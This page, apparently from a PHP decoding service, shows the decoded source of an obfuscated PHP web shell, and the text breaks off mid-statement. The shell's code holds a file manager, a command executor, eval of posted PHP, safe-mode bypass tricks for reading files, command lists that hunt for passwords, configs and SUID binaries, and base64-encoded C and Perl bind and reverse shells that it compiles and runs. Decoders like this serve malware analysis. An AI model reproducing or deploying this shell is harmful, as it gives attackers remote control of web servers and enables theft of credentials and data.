Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

goto tR9xz; qhLgb: function hardFooter() { $is_writable = is_writable($GLOBALS["\143\167\..

Decoded Output download

<?   goto tR9xz; qhLgb: function hardFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='#FFDB5F'>[ Writeable ]</font>" : " <font color=red>(Not writable)</font>"; echo "
</div>\xa<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
\x9<tr>\xa	\x9<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g(null,this.c.value,'');" : '') . "return false;"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='submit'></form></td>\xa	\x9<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value);" : '') . "return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
\x9</tr><tr>\xa	\x9<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g('FilesMan',null,'mkdir',this.d.value);" : '') . "return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
\x9	<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value,'mkfile');" : '') . "return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>\xa\x9</tr><tr>
\x9\x9<td><form onsubmit="" . (function_exists("actionConsole") ? "g('Console',null,this.c.value);" : '') . "return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>\xa		<td><form method='post' " . (!function_exists("actionFilesMan") ? " onsubmit="return false;" " : '') . "ENCTYPE='multipart/form-data'>\xa\x9	<input type=hidden name=a value='FilesMan'>
\x9	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa\x9	<input type=hidden name=p1 value='uploadFile'>
	\x9<input type=hidden name=ne value=''>\xa	\x9<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
		<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='submit'></form><br  ></td>\xa	</tr></table></div>
	<!-- particles --> <div id='particles-js'></div><script src='http://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js'></script>
\x9<script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':800}},'color':{'value':'#ffffff'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#000000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':40,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#ffffff','opacity':0.4,'width':1},'move':{'enable':true,'speed':1,'direction':'none','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':200,'line_linked':{'opacity':0.5}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>\xa	</body></html>"; } goto DJcUw; nbMDY: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " GB"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " MB"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " KB"; } elseif ($bytes > 1) { $bytes = $bytes . " bytes"; } elseif ($bytes == 1) { $bytes = $bytes . " byte"; } else { $bytes = "0 bytes"; } return $bytes; } goto XXrTo; O8Bkq: function actionSelfRemove() { if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } if ($_POST["p1"] != "yes") { hardHeader(); } echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; hardFooter(); } goto u4WS6; KOaKG: function actionFilesMan() { if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if (is_array($_FILES["f"]["tmp_name"])) { foreach ($_FILES["f"]["tmp_name"] as $i => $tmpName) { if (!@move_uploaded_file($tmpName, $_FILES["f"]["name"][$i])) { echo "Can't upload file!"; } } } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = opendir($path); while (($ = readdir($dh)) !== false) { $ = $path . $; if (basename($) == ".." || basename($) == ".") { continue; } $type = filetype($); if ($type == "dir") { deleteDir($); } else { @unlink($); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "paste": if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { chdir($_COOKIE["c"]); foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["cwd"]); $zip->close(); } } } elseif ($_COOKIE["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { chdir($_COOKIE["c"]); $_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]); ex("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"])); chdir($GLOBALS["cwd"]); } unset($_COOKIE["f"]); setcookie("f", '', time() - 3600); break; default: if (!empty($_POST["p1"])) { prototype("act", $_POST["p1"]); prototype("f", serialize(@$_POST["f"])); prototype("c", @$_POST["c"]); } break; } } hardHeader(); echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; $dirContent = hardScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); if ($dirContent === false) { echo "Can't open this folder!"; hardFooter(); return; } global $sort; $sort = array("name", 1); if (!empty($_POST["p1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "<script>
	function sa() {
\x9	for(i=0;i<d.files.elements.length;i++)
\x9		if(d.files.elements[i].type == 'checkbox')\xa\x9			d.files.elements[i].checked = d.files.elements[0].checked;
	}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xa<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => viewPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } $GLOBALS["sort"] = $sort; function cmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title='{$f["link"]}'") . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? viewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a class="tooltip" data-tooltip="Frame" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'frame')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } echo "<tr id=fak><td colspan=7>\xa\x9<input type=hidden name=ne value=''>
	<input type=hidden name=a value='FilesMan'>\xa	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>
	<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xa\x9<label><select name='p1'>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>\342\206\xb3 Paste</option>"; } echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if (class_exists("ZipArchive")) { echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; } echo "<option value='tar'>+ tar.gz</option>"; echo "</select></label>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "&nbsp;file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'>&nbsp;"; } echo "<input type='submit' value='submit'></td></tr></form></table></div>"; hardFooter(); } goto Bpag2; rc2dt: function ex($in) { $ = ''; if (function_exists("exec")) { @exec($in, $); $ = @join("\xa", $); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $ = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $ = ob_get_clean(); } elseif (function_exists("shell_exec")) { $ = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $ = ''; while (!@feof($f)) { $ .= fread($f, 1024); } pclose($f); } else { return "\342\x86\xb3 Unable to execute command\xa"; } return $ == '' ? "\342\206\263 Query did not return anything
" : $; } goto YQzoR; r2c06: @ini_set("log_errors", 0); goto dPBlO; XGk3X: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto Y2Zvy; TA8hx: $ = "UTF-8"; goto TQhs6; fqre7: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto wJWJM; ewK8X: if (empty($_POST["charset"])) { $_POST["charset"] = $; } goto hJVFy; ee0Wn: $ = md5($pw_unhashed); goto z59JV; gaWab: function actionNetwork() { hardHeader(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>\xa\x9<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>\xa	<span>Bind port to /bin/sh</span><br/>\xa	Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
	</form>\xa\x9<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
\x9<span>Back-connect to</span><br/>
	Server: <input type='text' name='server' value=" . $_SERVER["REMOTE_ADDR"] . "> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>\xa\x9</form><br>"; if (isset($_POST["p1"])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t)); @fclose($w); } } if ($_POST["p1"] == "bpc") { cf("/tmp/bp.c", $bind_port_c); $ = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $ .= ex("/tmp/bp " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bp") . "</pre>"; } if ($_POST["p1"] == "bpp") { cf("/tmp/bp.pl", $bind_port_p); $ = ex(which("perl") . " /tmp/bp.pl " . $_POST["p2"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bp.pl") . "</pre>"; } if ($_POST["p1"] == "bcc") { cf("/tmp/bc.c", $back_connect_c); $ = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $ .= ex("/tmp/bc " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bc") . "</pre>"; } if ($_POST["p1"] == "bcp") { cf("/tmp/bc.pl", $back_connect_p); $ = ex(which("perl") . " /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bc.pl") . "</pre>"; } } echo "</div>"; hardFooter(); } goto PYh2w; aQUM2: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["p1"]) { case 1: $temp = @tempnam($test, "cx"); if (@copy("compress.zlib://" . $_POST["p2"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "Sorry... Can't open file"; } break; case 2: $files = glob($_POST["p2"] . "*"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "
"; } } break; case 3: $ch = curl_init("file://" . $_POST["p2"] . "\x0" . SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include $_POST["p2"]; break; case 5: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { echo join(":", $uid) . "
"; } } break; case 6: if (!function_exists("imap_open")) { break; } $stream = imap_open($_POST["p2"], '', ''); if ($stream == FALSE) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "<h1>Safe mode bypass</h1><div class=content>"; echo "<span>Copy (read file)</span><form onsubmit='g(null,null,"1",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit='g(null,null,"2",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit='g(null,null,"3",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit='g(null,null,"4",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit='g(null,null,"6",this.param.value);return false;'><input type=text name=param><input type=submit value="submit"></form>"; if ($temp) { echo "<pre class="ml1" style="margin-top:5px" id="Output">" . $temp . "</pre>"; } echo "</div>"; hardFooter(); } goto W_qyb; YQzoR: function viewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto XXfsY; WMTEU: function actionPhp() { if (isset($_POST["ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = true; ob_start(); eval($_POST["p1"]); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa\xd	\'\0") . "';
"; echo strlen($temp), "
", $temp; die; } hardHeader(); if (isset($_POST["p2"]) && $_POST["p2"] == "info") { echo "<h1>PHP info</h1><div class=content>"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("!body {.*}!msiU", '', $tmp); $tmp = preg_replace("!a:\w+ {.*}!msiU", '', $tmp); $tmp = preg_replace("!h1!msiU", "h2", $tmp); $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); $tmp = preg_replace("!body, td, th, h2, h2 {.*}!msiU", '', $tmp); echo $tmp; echo "</div><br>"; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false; } echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; if (!empty($_POST["p1"])) { ob_start(); eval($_POST["p1"]); echo htmlspecialchars(ob_get_clean()); } echo "</pre></div>"; hardFooter(); } goto KOaKG; hJVFy: if (!isset($_POST["ne"])) { if (isset($_POST["a"])) { $_POST["a"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["a"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["c"])) { $_POST["c"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["c"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p1"])) { $_POST["p1"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p1"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p2"])) { $_POST["p2"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p2"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if 